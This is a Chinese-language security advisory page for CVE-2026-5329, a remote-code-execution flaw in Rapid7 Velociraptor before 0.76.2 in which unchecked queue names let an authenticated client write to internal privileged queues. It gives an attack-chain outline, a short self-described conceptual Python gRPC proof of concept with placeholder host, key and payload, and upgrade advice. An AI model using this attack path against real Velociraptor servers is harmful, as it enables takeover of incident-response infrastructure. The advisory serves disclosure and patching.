CVE-2026-5329 CVSS 8.5 高危

CVE-2026-5329 Rapid7 Velociraptor 队列写入致RCE

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5329

漏洞类型

远程代码执行

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Rapid7 Velociraptor

漏洞概述

Rapid7 Velociraptor 0.76.2之前版本存在输入验证不当漏洞，允许经过身份验证的远程攻击者通过构造恶意监控消息写入内部任意队列，从而导致服务器端远程代码执行。

技术细节

该漏洞源于Rapid7 Velociraptor服务器端处理客户端监控消息时的逻辑缺陷。在0.76.2之前的版本中，负责接收客户端监控消息的处理程序未对客户端提交的“队列名称”参数进行充分的校验。攻击者只需拥有低权限的客户端认证凭证，即可向服务器发送特制的监控消息。在该消息中，攻击者将队列名称指定为服务器内部用于系统管理的特权队列（如内部任务队列）。由于缺乏验证，服务器会盲目接受该消息并将其写入目标队列。随后，Velociraptor的服务端调度机制会处理这些特权队列中的消息，导致攻击者注入的恶意指令被服务器执行，进而实现远程代码执行。该漏洞主要影响Linux平台上的自托管实例，云端托管实例不受影响。

攻击链分析

STEP 1

1. 获取凭证

攻击者通过钓鱼或漏洞利用获取Velociraptor客户端的有效认证凭证。

STEP 2

2. 构造恶意消息

攻击者利用Python或其他脚本构造包含恶意队列名称的监控消息。

STEP 3

3. 注入内部队列

将恶意消息发送至服务器，由于验证缺失，消息被写入内部特权队列。

STEP 4

4. 执行代码

服务器处理特权队列中的恶意消息，导致攻击者指定的代码在服务器上执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# This is a conceptual PoC for CVE-2026-5329
# It demonstrates how a crafted monitoring message might be sent.

import grpc
import velociraptor_pb2
import velociraptor_pb2_grpc

class Exploit:
    def __init__(self, host, port, api_key):
        self.host = host
        self.port = port
        self.api_key = api_key
        self.channel = grpc.insecure_channel(f'{host}:{port}')
        self.stub = velociraptor_pb2_grpc.APIStub(self.channel)

    def send_malicious_message(self, malicious_queue_name, payload):
        # Construct a monitoring message
        # The vulnerability lies in 'queue_name' not being validated
        message = velociraptor_pb2.VQLClientArgs(
            Query=f"SELECT * FROM monitoring_message(queue='{malicious_queue_name}', data='{payload}')"
        )
        
        try:
            response = self.stub.Query(message)
            print(f"[+] Payload sent to internal queue: {malicious_queue_name}")
            print(f"[+] Response: {response}")
        except Exception as e:
            print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example usage
    # Targeting a hypothetical internal privileged queue
    TARGET_QUEUE = "System.Queue.Manager.Internal" 
    PAYLOAD = "malicious_command_to_execute"
    
    exp = Exploit("127.0.0.1", 8001, "VALID_API_KEY")
    exp.send_malicious_message(TARGET_QUEUE, PAYLOAD)

影响范围

Rapid7 Velociraptor < 0.76.2

防御指南

临时缓解措施

建议立即升级到 0.76.2 版本。若暂时无法升级，应严格限制客户端对服务器的访问，并审查所有已连接客户端的完整性和来源，防止恶意客户端接入。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表